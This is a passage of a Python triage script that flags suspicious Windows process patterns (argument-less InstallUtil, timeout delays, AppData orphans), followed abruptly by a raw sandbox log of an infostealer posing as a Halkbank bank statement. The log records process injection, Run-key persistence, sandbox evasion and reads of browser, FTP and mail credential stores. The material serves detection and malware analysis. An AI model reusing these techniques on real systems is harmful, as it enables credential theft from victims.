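    (15, 1, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"),
    (17, 0, r"C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe",
     r'"C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"'),
    (20, 17, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c timeout 20'),
    # Benign control (constructed): a build tool registering a service with an argument.
    (30, 29, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\build\MyService.exe"),
]

USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\", re.IGNORECASE)


def build_tree(events):
    """Index processes by PID and link children to parents present in the log."""
    procs = {pid: Proc(pid, ppid, image, cmd) for pid, ppid, image, cmd in events}
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def split_args(cmdline):
    """Tokenise a Windows command line; posix=False keeps backslashes literal."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def image_name(path):
    return ntpath.basename(path).lower()


def find_installutil_without_args(procs):
    """InstallUtil.exe takes an assembly path (or /u etc.).  A bare invocation
    that keeps running only makes sense as an injection host."""
    return sorted(p.pid for p in procs.values()
                  if image_name(p.image) == "installutil.exe"
                  and len(split_args(p.cmdline)) == 1)


def find_timeout_sleep(procs):
    """cmd.exe /c timeout N spawned by a binary in a user-writable path: a
    delay used to outlast sandbox time.  Returns (cmd pid, parent pid, seconds)."""
    hits = []
    for p in procs.values():
        if image_name(p.image) != "cmd.exe":
            continue
        args = [a.lower() for a in split_args(p.cmdline)]
        if "/c" not in args or "timeout" not in args:
            continue
        parent = procs.get(p.ppid)
        if parent is None or not USER_WRITABLE.match(parent.image):
            continue
        i = args.index("timeout")
        delay = int(args[i + 1]) if i + 1 < len(args) and args[i + 1].isdigit() else None
        hits.append((p.pid, parent.pid, delay))
    return sorted(hits)


def find_appdata_orphans(procs):
    """Executables under AppData\\Roaming whose parent is absent from the log:
    typical of a dropped copy relaunched through an autostart entry."""
    return sorted(p.pid for p in procs.values()
                  if re.search(r"\\AppData\\Roaming\\", p.image, re.IGNORECASE)
                  and p.ppid not in procs)


def triage(events):
    procs = build_tree(events)
    return {
        "installutil_no_args": find_installutil_without_args(procs),
        "timeout_sleep": find_timeout_sleep(procs),
        "appdata_orphans": find_appdata_orphans(procs),
    }


if __name__ == "__main__":
    for rule, hits in triage(EVENTS).items():
        print(f"{rule}: {hits}")
```

The argument-count rule is the one to keep: it fires on the sample's InstallUtil instance but not on the constructed control that passes an assembly path, so it separates LOLBin abuse from the tool's normal use without relying on the parent's identity. Feed real Sysmon Event ID 1 records into EVENTS with the same four fields to run it against live data.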
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File created: C:\Users\user\AppData\Roaming\Zsjnsslxj
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/4@7/4
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_01
Source: 15.0.InstallUtil.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.1.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.1.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.2.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.2.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Halkbank_Ekstre_20220513_082357_541079.exe, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Ffnbziuo.exe.0.dr, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.Ffnbziuo.exe.10000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.Ffnbziuo.exe.10000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06459F88 push eax; retf 0_2_06459F96
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645FB69 push eax; iretd 0_2_0645FB79
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645F338 pushfd ; retf 0_2_0645F339
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645F1D8 pushad ; retf 0_2_0645F341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331662 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633166A push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633165E push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316A6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169A push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169E push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316CA push es; ret 15_2_063318C4
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: 0x90D0B804 [Fri Dec 28 08:15:00 2046 UTC]
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ffnbziuo
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe TID: 6664 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe TID: 6448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3876 Thread sleep count: 152 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6952 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6956 Thread sleep count: 5109 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6956 Thread sleep count: 3660 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6036 Thread sleep count: 130 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2536 Thread sleep count: 87 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5BB28 LdrInitializeThunk, 15_2_06A5BB28
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10EA008
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe VolumeInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality
